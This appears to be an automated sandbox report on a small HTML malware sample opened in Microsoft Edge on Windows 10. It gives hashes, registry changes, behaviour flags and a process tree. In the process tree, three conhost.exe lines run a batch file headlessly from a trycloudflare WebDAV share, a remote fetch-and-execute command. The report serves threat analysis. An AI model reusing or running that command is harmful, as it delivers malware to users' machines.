Analysis
max time kernel: 517s
max time network: 534s
platform: windows10-2004_x64
resource: win10v2004-20240508-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
submitted: 28-06-2024 11:33
Static task: static1
Behavioral task: behavioral1 (Sample: .html; Resource: win7-20240221-en)
Behavioral task: behavioral2 (Sample: .html; Resource: win10v2004-20240508-en)
General
Target: .html
Size: 2KB
MD5: 7cdc8f61fb1fc3883598588051cdbe0a
SHA1: 92e76e7557196531dbdf862421178ecaf4e248e2
SHA256: 6e6856c0003a452f331ac9f2c7d73c28ca0d1924763b43544dfa1a65cc92b68d
SHA512: 0a74b11895cc550b98c0ae6b89afc1eb564920bc519ecbdc75a985d485f876f8ffa86afae021c1569c7767c6d4362a3e7acb4df3d373ffaf2bbe872c4d158309
Malware Config
Signatures
Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes: msedge.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Modifies registry class (36 IoCs)
Processes: msedge.exe, OpenWith.exe, msedge.exe
description | ioc | process
Set value (data) | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | msedge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff | msedge.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Downloads" | msedge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | msedge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | msedge.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" | msedge.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" | msedge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | msedge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257" | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | OpenWith.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | msedge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | msedge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | msedge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e8005398e082303024b98265d99428e115f0000 | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | msedge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | msedge.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" | msedge.exe
Suspicious behavior: EnumeratesProcesses (14 IoCs)
Processes: msedge.exe, msedge.exe, identity_helper.exe, msedge.exe, msedge.exe, msedge.exe
pid | process | entries
1100 | msedge.exe | 2
640 | msedge.exe | 2
3512 | identity_helper.exe | 2
852 | msedge.exe | 2
2836 | msedge.exe | 2
2776 | msedge.exe | 4
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (11 IoCs)
Processes: msedge.exe
pid | process | entries
1100 | msedge.exe | 11
Suspicious use of FindShellTrayWindow (39 IoCs)
Processes: msedge.exe
pid | process | entries
1100 | msedge.exe | 39
Suspicious use of SendNotifyMessage (24 IoCs)
Processes: msedge.exe
pid | process | entries
1100 | msedge.exe | 24
Suspicious use of SetWindowsHookEx (2 IoCs)
Processes: msedge.exe, OpenWith.exe
pid | process
852 | msedge.exe
1996 | OpenWith.exe
Suspicious use of WriteProcessMemory (64 IoCs)
Processes: msedge.exe
description | pid | process | target process
PID 1100 wrote to memory of 2708 | 1100 | msedge.exe | msedge.exe
PID 1100 wrote to memory of 3248 | 1100 | msedge.exe | msedge.exe
PID 1100 wrote to memory of 640 | 1100 | msedge.exe | msedge.exe
PID 1100 wrote to memory of 1360 | 1100 | msedge.exe | msedge.exe
(64 entries in total; each of the four distinct rows above is repeated in the report, all writes originating from PID 1100)
Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1100)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\.html
  - Enumerates system info in registry
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2708, child of 1100)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa82fd46f8,0x7ffa82fd4708,0x7ffa82fd4718

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3248, child of 1100)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 640, child of 1100)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 /prefetch:3
      - Suspicious behavior: EnumeratesProcesses

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1360, child of 1100)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2504 /prefetch:8

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 408, child of 1100)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2880 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3116, child of 1100)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2900 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (PID 1072, child of 1100)
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5124 /prefetch:8

    C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (PID 3512, child of 1100)
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5124 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 8, child of 1100)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4120, child of 1100)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5224 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3244, child of 1100)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3612 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 828, child of 1100)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 704, child of 1100)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 848, child of 1100)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5352 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 208, child of 1100)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5560 /prefetch:8

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 852, child of 1100)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4188 /prefetch:8
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of SetWindowsHookEx

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3872, child of 1100)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4852, child of 1100)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5996 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3424, child of 1100)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2256 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2836, child of 1100)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5396 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2776, child of 1100)
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,12868286639712176931,14651388116981505712,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5368 /prefetch:2
      - Suspicious behavior: EnumeratesProcesses

C:\Windows\System32\CompPkgSrv.exe (PID 5100)
  C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe (PID 2300)
  C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\OpenWith.exe (PID 1996)
  C:\Windows\system32\OpenWith.exe -Embedding
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx

C:\Windows\System32\rundll32.exe (PID 1380)
  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\System32\conhost.exe (PID 3312)
  "C:\Windows\System32\conhost.exe" --headless \\flu-survival-educational-nba.trycloudflare.com@SSL\DavWWWRoot\new.bat

C:\Windows\System32\conhost.exe (PID 1452)
  "C:\Windows\System32\conhost.exe" --headless \\flu-survival-educational-nba.trycloudflare.com@SSL\DavWWWRoot\new.bat

C:\Windows\System32\conhost.exe (PID 316)
  "C:\Windows\System32\conhost.exe" --headless \\flu-survival-educational-nba.trycloudflare.com@SSL\DavWWWRoot\new.bat
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 152B
MD5: 4b4f91fa1b362ba5341ecb2836438dea
SHA1: 9561f5aabed742404d455da735259a2c6781fa07
SHA256: d824b742eace197ddc8b6ed5d918f390fde4b0fbf0e371b8e1f2ed40a3b6455c
SHA512: fef22217dcdd8000bc193e25129699d4b8f7a103ca4fe1613baf73ccf67090d9fbae27eb93e4bb8747455853a0a4326f2d0c38df41c8d42351cdcd4132418dac

Filesize: 152B
MD5: eaa3db555ab5bc0cb364826204aad3f0
SHA1: a4cdfaac8de49e6e6e88b335cfeaa7c9e3c563ca
SHA256: ef7baeb1b2ab05ff3c5fbb76c2759db49294654548706c7c8e87f0cde855b86b
SHA512: e13981da51b52c15261ecabb98af32f9b920651b46b10ce0cc823c5878b22eb1420258c80deef204070d1e0bdd3a64d875ac2522e3713a3cf11657aa55aeccd4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\1cf18b7c-d77d-4ccb-a6df-a32022003536.tmp
Filesize: 6KB
MD5: 7addb8da5a1841a541dff1fb647f2419
SHA1: 6fc7ffcc7d7018c57f3627ded53a9ecfbe4529be
SHA256: 1833d9b2b16feed8bd636c825fd2d37e6c44b7ec834446035e332d7375ed7b9e
SHA512: 95b5fef74963813f814be47a415e4f388e986bb8187bd914bae117ca3c99f00b65b741f319816162b2e17de3a5e5eef2a7714815c05eeb7a86f04a8e637756c1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize: 72B
MD5: a6cd20596db4612eaa07fdb213951691
SHA1: ea30cdb51722ff1586b234d208dab65eb101bd53
SHA256: 7b67b7fd029225ff5ec991e7fdf178cc8a613aeb4c845e61107fe41273634e1a
SHA512: 1c52da03ad104e34d359b288e635daf8891714d13d23f2b3b2005c5708cf10869115747f42ad16c5fab00e63bdd9207c8331901730b1ed8b8d16213a7fcbd2de

Filesize: 180B
MD5: 00a455d9d155394bfb4b52258c97c5e5
SHA1: 2761d0c955353e1982a588a3df78f2744cfaa9df
SHA256: 45a13c77403533b12fbeeeb580e1c32400ca17a32e15caa8c8e6a180ece27fed
SHA512: 9553f8553332afbb1b4d5229bbf58aed7a51571ab45cbf01852b36c437811befcbc86f80ec422f222963fa7dabb04b0c9ae72e9d4ff2eeb1e58cde894fbe234f

Filesize: 6KB
MD5: 4b3bd8ed94d37a6b72a08692b8d4a484
SHA1: 8945ec4a766c70b4e5196880d16a0d4a24bda7e3
SHA256: 00aa0d48b1f541f28a0958ff29d63a95c2356c7132cb580141630ba48da1a000
SHA512: 4a940d010f972c10353d91e3b98b19be3a26f3369cbcf421d5f870ba3f4489adbb7054293df8e669471718128c9ce31c8ad8793a53f371b5c313d5ad12696f0c

Filesize: 5KB
MD5: 90350562946b6e63f73e5a2b55782477
SHA1: ea8b351eae5ae437f2e4ac6dc909a4265ceeb4ae
SHA256: dbd5f55beb6bbe776e9d44a0c26aa61a2d3bac2a9b1547331d769e43ca25e38b
SHA512: ffaacefebe8fc84dceebddfce753edb4c05cedf5a4db0545435d8f24e2b77ae47ccbdd0e0fd52a6cf8f695f6c398bef6b6db1e0f1b8d32c4522884d1b8be07e8

Filesize: 6KB
MD5: 0b44c4922a3e18e3b2facfbf0172ef0c
SHA1: b6095ae9d14e93f5aa24a39a3fc7cc5728a1f516
SHA256: 4ece41fca0f2d7bcf87046d1b0c079350159fc0f0c354b3b3001ad775fbccdce
SHA512: 48b4162e89324f2feeefa0bc460f7a2358ad86a70b447b9d2d4dd4f40f7c5887f4ce63147a78f6b1dfaad23f0823702d29b196b8a6890434d8fea974d886df2f

Filesize: 6KB
MD5: e464003bdbdc6b685aa66dadb4a1101d
SHA1: 9f7934d20067b5b16244b0953993a3c4dc44fdaa
SHA256: acf1b3a746e1d63f296cef2927564a7a0ad43564c2aaebb5fb3c12c23dfa4f3a
SHA512: d0dd51d42035d6703291c7df05a1ec30423c8bb07ebda27eb5510fa553cecc9d398ae5e308d84406a3f8eea74f1ec9c987015e05db03189b0af3547aeaf2711f

Filesize: 16B
MD5: 6752a1d65b201c13b62ea44016eb221f
SHA1: 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256: 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512: 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Filesize: 11KB
MD5: a4d8022175d9d0af34ba4ee2a7c76966
SHA1: cd385c41dff13b78cd669163761a210d2c5d07b2
SHA256: 11b2849a4e856526435d0d49aed7c79d4f5c4768be2c45809ab13ae8536ebf39
SHA512: d454453f22722a110176a8b810b894e8c3e98f5924fff59386e99fb8b6d80b3385ba57415f1ac38c9b83280cc118f81552030130b3162c020765758b68675b2d

Filesize: 10KB
MD5: a002a551eaf7e791fda0647ba4c2d56c
SHA1: 7d2ab15962b2c0d52ac66bfa1629786baee10176
SHA256: 0a3a89bad302c7316886ee07d82476fcafcf56e10936a0602d06d2551124402f
SHA512: 36a5072ec84c0959e8638a7fa68126259c3f7ffccdfe20469ff5ecccbcb7b1abe89921070e16861608d97486aead4d53ccb4e2d3728713bccc3d7e4f70741082

Filesize: 11KB
MD5: edfe4591f414ab7a35a5eaf32ef376c3
SHA1: af308f79d00f2b8a7dcee4d6e0b4efdcc646d239
SHA256: 3e857d408e9e44b3ab1e084963838ab9c538129555a2bc3eb52d02644525c86d
SHA512: 43e41143a5bcb3e9640c8b5c91a92d5ddcc227b99efcd9cc19150be8079f957eedb6c9be12fa85791df3c2c203891e650aef8946170982a701e4b53122315007

Filesize: 10KB
MD5: 6a2ac6dc5ec591fa61f0933dddfd1757
SHA1: 6620ee8b21768f710594a4039cde8f291640adc1
SHA256: 619ff7ddbf6819f4ec5b63a4b1cbb2cfa16c4c0904880a0976c2aea42d576b50
SHA512: fce27d88b2d503253841dc77f304e5832cff67a8cd9d738d6fb5f00158712a589a6d99fa2538720e9ba1ac269d1256eebfa073777d418fa0d9bdf4e1a7de8e9d

Filesize: 1KB
MD5: f40753bdd2e1cf77969c2a68c3664f56
SHA1: f64c6469df70d8b4c86b9eef24f9d9a193cffd56
SHA256: 9ccdc079edc26e57c6f5637a08d96b0dbdf6dd1e93c8b060a58105bf4aa47bd4
SHA512: d7f2a051d522e3f9100aead7eeb1823f2078a7e7c1dbe28ccc0fe4f1f2d9c332bca59076d460442d057f88b993b1971272a6af7a361ea151f913cd28c5d6ae99

MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e